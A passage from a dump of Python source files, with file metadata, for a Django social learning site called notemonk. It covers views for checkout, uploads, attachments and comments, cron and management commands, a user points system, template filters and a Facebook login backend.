= [x for x in cart if x is not None]\r\n\r\n next = request.GET.get('next', reverse('home_page'))\r\n return HttpResponseRedirect(next)\r\n\r\n@custom_login_required\r\ndef cart_checkout_view(request):\r\n\r\n profile = request.user.get_profile()\r\n\r\n if request.method == 'POST':\r\n form = MailingAddressForm(request.POST)\r\n if form.is_valid():\r\n mailing_address = form.cleaned_data['mailing_address']\r\n profile.mailing_address = mailing_address\r\n profile.save()\r\n\r\n r = Redemption.add(request.session['cart'], request.user)\r\n del request.session['cart']\r\n\r\n if r:\r\n followers = get_followers(profile)\r\n Activity.add(request.user, r)\r\n notification.send(followers, 'user_redeemed',\r\n {'user': request.user, 'redemption': r})\r\n else:\r\n request.session['cart'] = []\r\n return render_response(request, 'ui/base.html',\r\n {'error': 'Someone grabbed the items before you did. 
Try again.'})\r\n\r\n            return HttpResponseRedirect(reverse('redemption_page',\r\n                                kwargs={'r_id': r.id}) + '?msg=1')\r\n    else:\r\n        form = MailingAddressForm(initial=\r\n            {'mailing_address': profile.mailing_address})\r\n\r\n    return render_response(request, 'ui/cart_checkout.html',\r\n                           {'form': form,\r\n                            'page_title': PTITLE % 'Checkout'})\r\n\r\n@ensure_no_mem_file\r\n@custom_login_required\r\ndef insert_image_view(request, target_type=None, target=None):\r\n\r\n    if target_type is not None and target is not None:\r\n        target = get_target(target_type, target)\r\n\r\n    url = ''\r\n    error = ''\r\n    title = ''\r\n    alt = ''\r\n\r\n    if request.method == 'POST':\r\n        url = request.POST.get('url', '')\r\n        title = request.POST.get('title', '')\r\n        alt = request.POST.get('alt', '')\r\n\r\n        image = request.FILES.get('image')\r\n\r\n        if image:\r\n            path = image.temporary_file_path()\r\n            # PIL's Image module, aliased locally so it does not clash with\r\n            # the Image model used elsewhere in this module; Image.open()\r\n            # raises IOError for files that are not images\r\n            import Image as PILImage\r\n            try:\r\n                PILImage.open(path)\r\n            except IOError:\r\n                error = 'Please upload only image files'\r\n\r\n        if image and not error:\r\n\r\n            title = title or image.name\r\n            alt = alt or image.name\r\n\r\n            data = image.read()\r\n            checksum = hashlib.md5(data).hexdigest()\r\n\r\n            try:\r\n                ufile = UploadedFile.objects.get(checksum=checksum)\r\n            except ObjectDoesNotExist:\r\n                ufile = UploadedFile.objects.create(checksum=checksum,\r\n                                                    uploader=request.user)\r\n                cfile = ContentFile(data)\r\n                ufile.file.save(image.name, cfile, save=True)\r\n                ufile.save()\r\n\r\n            url = ufile.file.url\r\n\r\n            if target:\r\n                try:\r\n                    attachment = target.attachments.get(uploaded_file=ufile)\r\n                    title = title or attachment.title\r\n                except ObjectDoesNotExist:\r\n                    attachment = target.attach(request.user, ufile=ufile, title=title)\r\n\r\n    return render_response(request, 'ui/insert_image.html',\r\n                           {'error': error, 'alt': alt,\r\n                            'url': url, 'title': title})\r\n\r\ndef attachments_view(request, target_type, target, page_no=1, num=ITEMS_PER_PAGE):\r\n    target = get_target(target_type, target)\r\n    attachments = make_paginator(target.attachments.all(), page_no, num)\r\n    page_title = PTITLE % ('Attachments for %s' % target.title)\r\n    paging_url = '/attachments/%d/%d/<PAGENO>/' % (target.ctype.id, target.id)\r\n    return render_response(request, 'ui/attachments.html',\r\n                           {'target': target, 'attachments': attachments,\r\n                            'page_title': page_title, 'paging_url': paging_url})\r\n\r\ndef attachment_view(request, attachment_id):\r\n    attachment = Attachment.objects.get(id=attachment_id)\r\n    page_title = PTITLE % ('Attachment: %s' % attachment.title)\r\n\r\n    is_editable = False\r\n    if not request.user.is_anonymous():\r\n        is_editable = attachment.is_editable_by(request.user)\r\n\r\n    return render_response(request, 'ui/attachment.html',\r\n                           {'attachment': attachment, 'page_title': page_title,\r\n                            'is_editable': is_editable})\r\n\r\n@custom_login_required\r\ndef attachment_add_view(request, target_type, target):\r\n    target = get_target(target_type, target)\r\n    url = ''\r\n    error = ''\r\n\r\n    if request.method == 'POST':\r\n\r\n        url = request.POST.get('url', '')\r\n\r\n        f = request.FILES.get('file')\r\n        if f:\r\n\r\n            checksum = get_md5(f)\r\n            f.seek(0)\r\n            # reuse an existing upload with the same checksum if present\r\n            try:\r\n                ufile = UploadedFile.objects.get(checksum=checksum)\r\n            except 
ObjectDoesNotExist:\r\n attachment = target.attach(request.user, ufile=ufile, title='attachment')\r\n attachment.rate_up(request.user)\r\n attachment.save()\r\n ac = Activity.add(request.user, attachment)\r\n add_to_book_stream(attachment, ac)\r\n\r\n elif url:\r\n\r\n try:\r\n attachment = target.attachments.get(url=url)\r\n except ObjectDoesNotExist:\r\n attachment = target.attach(request.user, url=url, title='attachment')\r\n attachment.rate_up(request.user)\r\n attachment.save()\r\n\r\n return HttpResponseRedirect(reverse('attachment_edit_page',\r\n kwargs={'attachment_id': attachment.id}))\r\n\r\n return render_response(request, 'ui/attachment_add.html',\r\n {'error': error, 'url': url, 'target': target})\r\n\r\n@custom_login_required\r\ndef attachment_edit_view(request, attachment_id):\r\n error = False\r\n attachment = Attachment.objects.get(id=attachment_id)\r\n page_title = PTITLE % ('Attachment: %s' % attachment.title)\r\n\r\n #FIXME: check if attachment is editable by current user\r\n\r\n if request.method == 'POST':\r\n title = request.POST.get('title', 'attachment')\r\n description = request.POST.get('description', '')\r\n url = request.POST.get('url', '')\r\n\r\n if not attachment.uploaded_file and not url:\r\n error = True\r\n\r\n if not title.strip():\r\n error = True\r\n\r\n if not error:\r\n attachment.title = title\r\n attachment.description.raw = description\r\n if url:\r\n attachment.url = url\r\n attachment.save()\r\n\r\n return HttpResponseRedirect(reverse('attachment_page',\r\n kwargs={'attachment_id': attachment.id}))\r\n\r\n else:\r\n return render_response(request, 'ui/attachment_edit.html',\r\n {'attachment': attachment, 'page_title': page_title})\r\n\r\n@custom_login_required\r\ndef comment_add_view(request, target_type, target):\r\n next = request.GET.get('next', '')\r\n\r\n if request.method == 'POST':\r\n text = request.POST.get('text', '').strip()\r\n\r\n if text:\r\n target = get_target(target_type, target)\r\n comment = target.add_comment(user=request.user, text=text)\r\n\r\n followers = get_followers(request.user.get_profile(), target)\r\n notification.send(followers, 'comment_add', {'comment': comment})\r\n\r\n ac = Activity.add(request.user, comment)\r\n\r\n if request.user != target.user:\r\n target.user.get_profile().stream.add(ac)\r\n\r\n if isinstance(target, ProfilePost) and request.user != target.profile.user:\r\n target.profile.stream.add(ac)\r\n\r\n add_to_book_stream(target, ac)\r\n\r\n return HttpResponseRedirect(next)\r\n\r\n@custom_login_required\r\ndef comment_edit_view(request, comment_id):\r\n pass\r\n\r\ndef profilepost_view(request, profilepost_id):\r\n profilepost = ProfilePost.objects.get(id=profilepost_id)\r\n page_user = profilepost.user\r\n\r\n title = \"%s's %s\" % (profilepost.user.get_profile().title, 'ProfilePost')\r\n page_title = PTITLE % title\r\n\r\n return render_response(request, 'ui/profilepost.html',\r\n {'profilepost': profilepost, 'page_title': page_title,\r\n 'page_user': page_user,})\r\n\r\n@custom_login_required\r\ndef profilepost_add_view(request, profile_id):\r\n next = request.GET.get('next', '')\r\n profile = UserProfile.objects.get(id=profile_id)\r\n\r\n if request.method == 'POST':\r\n text = request.POST.get('text', '').strip()\r\n\r\n if text:\r\n post = ProfilePost.objects.create(user=request.user, text=text,\r\n profile=profile)\r\n post.rate_up(request.user)\r\n post.save()\r\n\r\n followers = get_followers(profile, request.user.get_profile())\r\n notification.send(followers, 'ppost_add', {'post': 
post})\r\n\r\n ac = Activity.add(request.user, post)\r\n\r\n if profile.user != request.user:\r\n profile.stream.add(ac)\r\n\r\n return HttpResponseRedirect(next)\r\n\r\n@custom_login_required\r\ndef profilepost_edit_view(request, post_id):\r\n pass\r\n\r\nALLITEMS_MAP = {'questions': Question, 'notes': Note, 'videos': AssociatedMedia}\r\ndef allitems_view(request, u_items=None, order='recent', page_no=1, num=ITEMS_PER_PAGE):\r\n\r\n if u_items not in ALLITEMS_MAP:\r\n return render_error(request, 'Unable to display items')\r\n\r\n klass = ALLITEMS_MAP[u_items]\r\n qorder = '-date_added' if order == 'recent' else '-score'\r\n items = klass.objects.all().order_by(qorder)\r\n items = make_paginator(items, page_no, num)\r\n\r\n title = '%s %s' % (order.capitalize(), u_items.capitalize())\r\n page_title = PTITLE % title\r\n paging_url = '/%s/all/%s/<PAGENO>/' % (u_items, order)\r\n return render_response(request, 'ui/allitems.html',\r\n {'page_title': page_title, 'items': items,\r\n 'paging_url': paging_url, 'title': title,\r\n 'u_items': u_items, 'order': order})\r\n\r\ndef handler_500(request):\r\n t = template.loader.get_template('ui/500.html')\r\n context = RequestContext(request, {})\r\n context['ref_path'] = '/'\r\n return HttpResponseServerError(t.render(context))\r\n\r\ndef handler_404(request):\r\n return render_response(request, 'ui/404.html')\r\n\r\ndef xd_receiver_view(request):\r\n return render_response(request, 'xd_receiver.htm')\r\n\r\n"
},
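The views module above extracts YouTube video ids in get_yt_id by splitting the query string by hand. For reference, a minimal standalone sketch of the same idea using the Python 2 standard library; the function name is reused for illustration and the test URLs are made up, not taken from the repo:

from urlparse import urlparse, parse_qs

def get_yt_id(yt_url):
    # parse_qs maps each query key to a list of values, e.g. {'v': ['abc123']}
    vals = parse_qs(urlparse(yt_url).query).get('v')
    return vals[0] if vals else None

assert get_yt_id('http://www.youtube.com/watch?v=abc123&feature=share') == 'abc123'
assert get_yt_id('http://example.com/?x=1') is None

parse_qs also decodes URL-encoded values, which the manual split in the view would pass through verbatim.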
{
"alpha_fraction": 0.6926910281181335,
"alphanum_fraction": 0.6976743936538696,
"avg_line_length": 59.20000076293945,
"blob_id": "b70d7a293cb34862c84fc69fd4aee10177f9e812",
"content_id": "940daf87afa1c516f002e1a8f3eca2cc0d2b3603",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1204,
"license_type": "no_license",
"max_line_length": 144,
"num_lines": 20,
"path": "/www/core/management/commands/create_cronjobs.py",
"repo_name": "headrun/notemonk",
"src_encoding": "UTF-8",
"text": "from django.core.management.base import BaseCommand\nfrom django.utils.translation import ugettext_noop as _\nfrom chronograph.models import Job\n\nclass Command(BaseCommand):\n help = 'Creates cronjobs in chronograph. Run once at installation time.'\n args = ''\n\n def handle(self, *args, **options):\n cron = lambda **kwargs: Job.objects.create(**kwargs)\n\n cron(name='Send Mails', frequency='MINUTELY', params='interval:1', command='send_mail', args='', disabled=False)\n cron(name='Process Ratings', frequency='MINUTELY', params='interval:1', command='process_ratings', args='', disabled=False)\n cron(name='Process Toppers', frequency='HOURLY', params='interval:1', command='process_toppers', args='', disabled=False)\n cron(name='Process Onliners', frequency='HOURLY', params='interval:1', command='process_onliners', args='', disabled=False)\n cron(name='Emit Notices', frequency='MINUTELY', params='interval:1', command='emit_notices', args='', disabled=False)\n cron(name='Update Leaderboard Data', frequency='HOURLY', params='interval:2', command='update_leaderboarddata', args='', disabled=False)\n\n def usage(self, subcommand):\n return ''\n"
},
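Because create_cronjobs calls Job.objects.create unconditionally, running the command a second time would insert duplicate jobs. A hedged sketch of an idempotent variant keyed on the job name, assuming chronograph's Job fields are exactly those used above:

def cron(name, **kwargs):
    # 'defaults' is only applied when the row does not exist yet,
    # so the installation command becomes safe to re-run
    job, created = Job.objects.get_or_create(name=name, defaults=kwargs)
    return job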
{
"alpha_fraction": 0.5744985938072205,
"alphanum_fraction": 0.5816618800163269,
"avg_line_length": 28.08333396911621,
"blob_id": "75872d6ec989731034c8186f657da46a66f86c0a",
"content_id": "81fabdb3dc07c3d9fb4484c51ebfc265043e2a5d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2094,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 72,
"path": "/www/scripts/load_outline.py",
"repo_name": "headrun/notemonk",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\nimport re\nimport sys\nfrom pprint import pprint\n\nfrom core.models import *\nfrom django.core.files.base import ContentFile\n\ndef parse_book_data(book):\n book = book.strip().split('\\n')\n name = book[0]\n book_file = book[1]\n image_file = book[2]\n \n data = book[3:]\n data = _parse_book_data(data, 0, 0)\n return name, book_file, image_file, data\n\ndef _parse_book_data(data, index, prev_indent):\n\n out = []\n\n cur_indent = prev_indent\n for index, d in enumerate(data):\n if d is None:\n continue\n cur_indent = len(re.findall('^ *', d)[0])\n if cur_indent > prev_indent:\n cdata = _parse_book_data(data, index, cur_indent)\n out[-1][1].extend(cdata)\n elif cur_indent == prev_indent:\n out.append([d.strip(), []])\n data[index] = None\n else:\n return out\n\n return out\n\ndef add_to_db(name, book_file, image_file, outline):\n b = Book.objects.create(title=name, followcount=0, flagcount=0)\n content = ContentFile(open(book_file, 'rb').read())\n thumbnail = ContentFile(open(image_file, 'rb').read())\n \n b.file.save(name+'.zip', content, save=True)\n b.cover_image.save(name+'.jpg', thumbnail, save=True) \n _add_to_db(b, outline, None)\n\ndef _add_to_db(book, data, parent):\n for index, (node, children) in enumerate(data):\n try: print 'Node: ', node\n except: pass\n n = Node.objects.create(title=node, parent=parent,\n book=book, order=index)\n _add_to_db(book, children, n)\n\ndef main(stream):\n books = stream.read().strip().split('\\n\\n')\n\n for book in books:\n name, book_file, image_file, outline = parse_book_data(book)\n try: print 'Book: ', name\n except: pass\n add_to_db(name, book_file, image_file, outline)\n\nif __name__ == '__main__':\n if len(sys.argv) < 2:\n print 'usage: python %s <book-data-file>' % sys.argv[0]\n sys.exit(1)\n\n books_data_file = sys.argv[1]\n stream = open(books_data_file).read()\n main(stream)\n"
},
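_parse_book_data above turns leading-space indentation into a nested [title, children] tree: it recurses whenever the indent grows, consumes lines in place by setting them to None, and returns when the indent shrinks. A hand-traced example of the output shape (the outline is constructed here for illustration, not taken from the repo's data files):

outline = ['Chapter 1',
           '  Section 1.1',
           '  Section 1.2',
           'Chapter 2']

# _parse_book_data(outline, 0, 0) returns:
# [['Chapter 1', [['Section 1.1', []], ['Section 1.2', []]]],
#  ['Chapter 2', []]]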
{
"alpha_fraction": 0.6654545664787292,
"alphanum_fraction": 0.6690909266471863,
"avg_line_length": 31.352941513061523,
"blob_id": "b630dfe0607945b9f750894f8eea85be67b6ef3f",
"content_id": "020624a3a1e319167d6129c25ba743034468074f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 550,
"license_type": "no_license",
"max_line_length": 97,
"num_lines": 17,
"path": "/www/core/management/commands/process_toppers.py",
"repo_name": "headrun/notemonk",
"src_encoding": "UTF-8",
"text": "from django.core.management.base import BaseCommand\nfrom core.models import *\n\nclass Command(BaseCommand):\n help = 'Process who are toppers and update in Toppers table for quick retrieval.'\n args = ''\n\n def handle(self, *args, **options):\n \n user_profiles = UserProfile.objects.filter(user__is_staff=False).order_by('-points')[:20]\n Toppers.objects.all().delete()\n\n for user_profile in user_profiles:\n Toppers.objects.create(user_profile = user_profile)\n\n def usage(self, subcommand):\n return ''\n"
},
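process_toppers deletes every Toppers row before re-inserting the top twenty, so a crash or concurrent read between the two steps can observe an empty leaderboard. One way to narrow that window, sketched against the pre-1.6 Django transaction API this codebase appears to target (the decorator choice is an assumption, not taken from the repo):

from django.db import transaction

@transaction.commit_on_success
def rebuild_toppers():
    # both statements commit together, so readers see either the old
    # leaderboard or the new one, never an empty table
    profiles = UserProfile.objects.filter(user__is_staff=False).order_by('-points')[:20]
    Toppers.objects.all().delete()
    for p in profiles:
        Toppers.objects.create(user_profile=p)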
{
"alpha_fraction": 0.6616822481155396,
"alphanum_fraction": 0.6691588759422302,
"avg_line_length": 27.157894134521484,
"blob_id": "d1f76a728b6599d3ed54e9aed3be624f42b5a214",
"content_id": "24496975ab5aad0068ca155e62128dabeed767e3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 535,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 19,
"path": "/www/core/management/commands/process_ratings.py",
"repo_name": "headrun/notemonk",
"src_encoding": "UTF-8",
"text": "from django.core.management.base import BaseCommand\nfrom core.models import *\nfrom core.points import give_points\n\nMAX_NOTIFICATIONS = 1000\n\nclass Command(BaseCommand):\n help = 'Process Rating Notifications and award User Points.'\n args = ''\n\n def handle(self, *args, **options):\n rns = RatingNotification.objects.all()[:MAX_NOTIFICATIONS]\n\n for rn in rns:\n give_points('rated', target=rn.target, num_ratings=rn.num_ratings)\n rn.delete()\n\n def usage(self, subcommand):\n return ''\n"
},
{
"alpha_fraction": 0.5279766917228699,
"alphanum_fraction": 0.5335454940795898,
"avg_line_length": 28.007692337036133,
"blob_id": "796942a6ac6b2bc71b42d8cff36fea4a9c168153",
"content_id": "695a7677b4187f8de0cbc4a256005ba6a0c60d2e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3771,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 130,
"path": "/www/core/points.py",
"repo_name": "headrun/notemonk",
"src_encoding": "UTF-8",
"text": "'''\nUser points, badges and awards system.\n'''\n\nfrom django.contrib.auth.models import User\nfrom models import *\n\nLEVEL_POINTS_PERCENT = .05\n\nRATING_MULTIPLIER = {\n Book: 4,\n Note: 2,\n AssociatedMedia: 2,\n Answer: 2,\n Question: 1,\n UserProfile: 1,\n }\n\ndef get_obj(klass, id):\n return klass.objects.get(pk=id)\n\nclass PointsSystem:\n @staticmethod\n def answer_add(code, data, user, answer):\n pass\n\n @staticmethod\n def video_add(code, data, user, avideo):\n pass\n\n @staticmethod\n def note_add(code, data, user, note):\n pass\n\n @staticmethod\n def question_add(code, data, user, question):\n pass\n\n @staticmethod\n def rated(code, data, target, num_ratings):\n\n level = Rateable.LEVELS.index(num_ratings) + 1\n\n if isinstance(target, ProfilePost):\n # no points for rating profile posts\n return\n\n ratings = target.ratings.order_by('date_added')[:num_ratings]\n value = sum(r.rating for r in ratings)\n\n if not value:\n return\n\n norm_value = value / value\n value = norm_value if value > 0 else -norm_value\n\n for index, r in enumerate(ratings):\n user_rating_level = PointsSystem._get_rating_level(index)\n level_diff = (level - user_rating_level) + 1\n\n rating_multiplier = 1\n if index == 0 and target.__class__ != UserProfile:\n # multiplier only for owner of item\n rating_multiplier = RATING_MULTIPLIER.get(target.__class__, 1)\n\n points = 1 if r.rating == value else -1\n points = points * level_diff * rating_multiplier\n\n userp = r.user.get_profile()\n userp.give_points(points)\n userp.save()\n\n data = {'target_type': target.ctype.id,\n 'target': target.id,\n 'num_ratings': num_ratings,\n 'position': index,\n 'rated_at_level': user_rating_level,\n 'current_level': level,\n 'level_diff': level_diff,\n 'rating_multiplier': rating_multiplier}\n \n p = PointsHistory.objects.create(user=r.user, points=points,\n code=code, data=repr(data))\n \n Activity.add(r.user, p)\n\n @staticmethod\n def _get_rating_level(count):\n for index, level_start in enumerate(Rateable.LEVELS):\n if count < level_start:\n return index + 1\n\n return len(Rateable.LEVELS) + 1\n\n @staticmethod\n def user_level_changed(code, data, user, prev_level, level):\n user = get_obj(User, user)\n \n if level > prev_level:\n level_score = UserProfile.LEVELS[level]\n sign = +1\n\n else:\n level_score = UserProfile.LEVELS[prev_level]\n sign = -1\n \n points = level_score * LEVEL_POINTS_PERCENT\n points = int(points) or 1\n points = sign * points\n\n referrer = user.get_profile().referrer\n if not referrer:\n return\n\n referrer = referrer.get_profile()\n referrer.give_points(points)\n referrer.save()\n\n p = PointsHistory.objects.create(user=referrer.user, points=points,\n code=code, data=data)\n\n Activity.add(referrer.user, p)\n\n @staticmethod\n def dummy(code, data, **kwargs):\n return\n\ndef give_points(code, **kwargs):\n points_fn = getattr(PointsSystem, code, PointsSystem.dummy)\n points_fn(code, repr(kwargs), **kwargs)\n"
},
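PointsSystem._get_rating_level maps a raw rating count onto the Rateable.LEVELS thresholds: the level is one plus the index of the first threshold the count has not yet reached. A standalone trace, with the thresholds copied from the code above and illustrative assertions:

LEVELS = [2, 10, 50, 100, 1000, 10000, 100000, 1000000,
          10000000, 100000000, 1000000000]

def get_rating_level(count):
    for index, level_start in enumerate(LEVELS):
        if count < level_start:
            return index + 1
    return len(LEVELS) + 1

assert get_rating_level(0) == 1     # 0..1 ratings
assert get_rating_level(5) == 2     # 2..9 ratings
assert get_rating_level(100) == 5   # 100..999 ratings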
{
"alpha_fraction": 0.5974882245063782,
"alphanum_fraction": 0.6025117635726929,
"avg_line_length": 21.429576873779297,
"blob_id": "5a627dd9e5e1a64bcca2be33eff2cb1ba73f74ea",
"content_id": "b8adaaa440910ff33b90823722bcc02aca88b5be",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3185,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 142,
"path": "/www/core/templatetags/filters.py",
"repo_name": "headrun/notemonk",
"src_encoding": "UTF-8",
"text": "import re\n\nfrom django.template import Library\nfrom django.template.defaultfilters import timesince, truncatewords, truncatewords_html\nfrom django.utils.safestring import mark_safe\n\nregister = Library()\n\[email protected]\ndef gt(value, arg):\n return value > int(arg)\n\[email protected]\ndef lt(value, arg):\n return value < int(arg)\n\[email protected]\ndef gte(value, arg):\n return value >= int(arg)\n\[email protected]\ndef lte(value, arg):\n return value <= int(arg)\n\[email protected]\ndef length_gt(value, arg):\n return len(value) > int(arg)\n\[email protected]\ndef length_lt(value, arg):\n return len(value) < int(arg)\n\[email protected]\ndef length_gte(value, arg):\n return len(value) >= int(arg)\n\[email protected]\ndef length_lte(value, arg):\n return len(value) <= int(arg)\n\[email protected]\ndef cname(value, arg=None):\n return value.__class__.__name__\n\[email protected]\ndef strip_p(value, arg=None):\n value = value.rendered.strip()\n if value.lower().count('<p>') == 1:\n value = re.sub('^<p>(?i)', '', value)\n value = re.sub('</p>$(?i)', '', value)\n return mark_safe(value.strip())\n\[email protected]\ndef brief(value, arg='p'):\n value = value.rendered.strip()\n nvalue = value\n\n if '<p>' in nvalue.lower():\n values = re.findall('<p>(.*?)</p>(?is)', nvalue)\n nvalue = values[0].strip() if values else nvalue\n\n if arg.isdigit():\n CHARS_PER_WORD = 8\n ntvalue = truncatewords_html(nvalue, int(arg)/CHARS_PER_WORD)\n if ntvalue == nvalue and value != nvalue:\n value = ntvalue + ' ...'\n else:\n value = ntvalue\n\n elif value != nvalue:\n value = nvalue + ' ...'\n\n return mark_safe(value)\n\[email protected]\ndef dt(value, arg=None):\n x = '<span title=\"%s\" class=\"light\">%s ago</span>' % (value.isoformat(), timesince(value))\n return mark_safe(x)\n\[email protected]\ndef nth(value, arg=None):\n value = str(value)\n\n if value == '1':\n s = 'st'\n\n elif value.endswith('2'):\n s = 'nd'\n\n elif value.endswith('3'):\n s = 'rd'\n\n else:\n s = 'th'\n\n return value + s\n\[email protected]\ndef add(value, arg=0):\n if isinstance(value, (str, unicode)) and value.isdigit():\n value = int(value)\n else:\n return value\n\n if not isinstance(value, int):\n return value\n\n return value + arg\n\[email protected]\ndef truncatesmart(value, limit=80):\n \"\"\"\n FROM: http://www.djangosnippets.org/snippets/1259/\n Truncates a string after a given number of chars keeping whole words.\n \n Usage:\n {{ string|truncatesmart }}\n {{ string|truncatesmart:50 }}\n \"\"\"\n \n try:\n limit = int(limit)\n # invalid literal for int()\n except ValueError:\n # Fail silently.\n return value\n \n # Make sure it's unicode\n value = unicode(value)\n \n # Return the string itself if length is smaller or equal to the limit\n if len(value) <= limit:\n return value\n \n # Cut the string\n value = value[:limit]\n \n # Break into words and remove the last\n words = value.split(' ')[:-1]\n \n # Join the words and return\n return ' '.join(words) + '...'\n"
},
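truncatesmart cuts at the character limit and then drops the last, possibly clipped, word before appending the ellipsis. A quick behavioural check (the import path follows this file's location; the strings are illustrative):

from core.templatetags.filters import truncatesmart

print truncatesmart('The quick brown fox jumps over the lazy dog', 15)
# -> 'The quick...'   ('The quick brown'[:15] minus the trailing partial word)
print truncatesmart('short sentence', 15)
# -> 'short sentence' (within the limit, returned unchanged)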
{
"alpha_fraction": 0.4865567982196808,
"alphanum_fraction": 0.48872506618499756,
"avg_line_length": 35.619049072265625,
"blob_id": "9ca558034c3098f2ba4451fe924c3862ceae532b",
"content_id": "6ce4f9934303cb777740ad65ddfafd82de6a1993",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2306,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 63,
"path": "/www/core/auth_backends.py",
"repo_name": "headrun/notemonk",
"src_encoding": "UTF-8",
"text": "import urllib2\n\nfrom django.contrib.auth.models import User\nfrom django.core.files.base import ContentFile\n\nfrom core.models import FBUserProfile\n\nclass FacebookBackend:\n def authenticate(self, request):\n fb_user = request.facebook.users.getLoggedInUser()\n \n try:\n profile = FBUserProfile.objects.get(uid=str(fb_user))\n return profile.user\n except FBUserProfile.DoesNotExist:\n fb_data = request.facebook.users.getInfo([fb_user], ['uid',\n 'username', 'email', 'about_me',\n 'first_name', 'last_name',\n 'pic_big', 'pic', 'pic_small',\n 'current_location', 'profile_url'])\n\n if not fb_data:\n return None\n\n fb_data = fb_data[0]\n username = 'fb.%s' % (fb_data['username'] or fb_data['uid'])\n user_email = fb_data['email'] or ''\n user = User.objects.create(username=username)\n user.first_name = fb_data['first_name']\n user.last_name = fb_data['last_name']\n user.save()\n\n FBUserProfile.objects.create(uid=str(fb_user), user=user)\n\n user_profile = user.get_profile()\n\n location = fb_data['current_location']\n if location:\n user_profile.city = location['city']\n user_profile.state = location['state']\n user_profile.country = location['country']\n user_profile.save()\n\n image_url = fb_data['pic_big']\n if image_url:\n try:\n image_ext = image_url.rsplit('.', 1)[-1]\n except IndexError:\n image_ext = 'jpg'\n \n image = urllib2.urlopen(image_url)\n cfile = ContentFile(image.read())\n \n image_name = '%s.%s' % (username, image_ext)\n user_profile.image.save(image_name, cfile, save=True)\n\n return user\n\n def get_user(self, user_id):\n try:\n return User.objects.get(pk=user_id)\n except User.DoesNotExist:\n return None"
},
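For FacebookBackend to be consulted by the authenticate(request=request) call in fb_login, it must be registered alongside the default backend. A sketch of the settings wiring; the module path follows this file's location, and the snippet itself is assumed rather than copied from the repo:

AUTHENTICATION_BACKENDS = (
    'core.auth_backends.FacebookBackend',
    'django.contrib.auth.backends.ModelBackend',  # normal username/password login
)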
{
"alpha_fraction": 0.6881029009819031,
"alphanum_fraction": 0.6913183331489563,
"avg_line_length": 33.55555725097656,
"blob_id": "94174f294e9cdfe7be6879adc6ba146830b1b75e",
"content_id": "4116b4591ff117e43aeee002069643a0bd36a8e9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 311,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 9,
"path": "/www/core/debug.py",
"repo_name": "headrun/notemonk",
"src_encoding": "UTF-8",
"text": "from django.db import connection\nfrom django.conf import settings\n\nclass SqlPrintingMiddleware(object):\n def process_response(self, request, response):\n if len(connection.queries) > 0 and settings.DEBUG:\n for query in connection.queries:\n print query\n return response\n"
},
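SqlPrintingMiddleware only prints when settings.DEBUG is true, but it still has to be installed. A minimal sketch of the settings wiring on the MIDDLEWARE_CLASSES-era Django this project uses (assumed snippet; keep it out of production settings):

MIDDLEWARE_CLASSES += (
    'core.debug.SqlPrintingMiddleware',  # prints every SQL query per response
)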
{
"alpha_fraction": 0.6392857432365417,
"alphanum_fraction": 0.6392857432365417,
"avg_line_length": 22.33333396911621,
"blob_id": "b93d0a4b6bd3b77adbe4e27be2631602b7a3855b",
"content_id": "b25f342267a189740c0604c1faafc628ae4ecb29",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 280,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 12,
"path": "/www/core/management/commands/sample.py",
"repo_name": "headrun/notemonk",
"src_encoding": "UTF-8",
"text": "from django.core.management.base import BaseCommand\n\nclass Command(BaseCommand):\n help = \"command name is 'sample'\"\n args = ''\n\n def handle(self, *args, **options):\n from django.conf import settings\n pass\n\n def usage(self, subcommand):\n return ''\n"
},
{
"alpha_fraction": 0.6198542714118958,
"alphanum_fraction": 0.6420764923095703,
"avg_line_length": 37.39160919189453,
"blob_id": "0de0ddd114f9f174b0d74fee4cfbe062bd9216fb",
"content_id": "24fa903126d36d851025f056cc7387e84b8591fd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5490,
"license_type": "no_license",
"max_line_length": 104,
"num_lines": 143,
"path": "/www/core/forms.py",
"repo_name": "headrun/notemonk",
"src_encoding": "UTF-8",
"text": "import new\n\nfrom django import forms\n\nfrom registration.forms import RegistrationFormUniqueEmail\nfrom notification.models import NoticeType\n\nW_TEXT = lambda s=40: forms.TextInput(attrs={'size':str(s)})\n\nclass RegistrationForm(RegistrationFormUniqueEmail):\n BLOCKED_USERNAMES = ['notemonk', 'adminmonk', 'support', 'contact',\n 'register', 'administrator', 'registrar', 'superuser', 'webmaster',\n 'anonymous', 'anonymoususer']\n\n referrer = forms.CharField(max_length=50, required=False)\n\n def clean_username(self):\n username = RegistrationFormUniqueEmail.clean_username(self)\n\n if not 6 < len(username) < 30:\n raise forms.ValidationError('Sorry, your username must be between 6 and 30 characters long')\n\n if username in self.BLOCKED_USERNAMES:\n raise forms.ValidationError('A user with that username already exists.')\n\n return username\n\nclass LoginForm(forms.Form):\n username = forms.CharField(max_length=50)\n password = forms.CharField(max_length=50, widget=forms.PasswordInput)\n persistent = forms.BooleanField(required=False, label='Stay signed in')\n\nclass UserProfileForm(forms.Form):\n first_name = forms.CharField(max_length=50, required=False, widget=W_TEXT(30))\n last_name = forms.CharField(max_length=50, required=False, widget=W_TEXT(30))\n email = forms.EmailField(widget=W_TEXT(30))\n password1 = forms.CharField(widget=forms.PasswordInput(attrs={'size':'30'}),\n required=False, label='Password')\n password2 = forms.CharField(widget=forms.PasswordInput(attrs={'size':'30'}),\n required=False, label='Password (re-enter)')\n institution = forms.CharField(max_length=50, required=False, widget=W_TEXT(30))\n city = 